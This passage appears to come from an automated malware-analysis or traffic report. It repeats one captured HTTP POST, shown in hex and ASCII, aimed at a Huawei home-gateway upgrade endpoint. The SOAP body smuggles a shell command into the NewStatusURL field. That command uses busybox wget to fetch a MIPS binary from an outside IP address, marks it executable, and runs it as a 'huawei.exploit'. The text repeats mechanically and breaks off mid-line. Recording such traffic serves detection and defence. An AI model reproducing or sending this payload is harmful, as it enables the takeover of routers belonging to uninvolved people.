61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 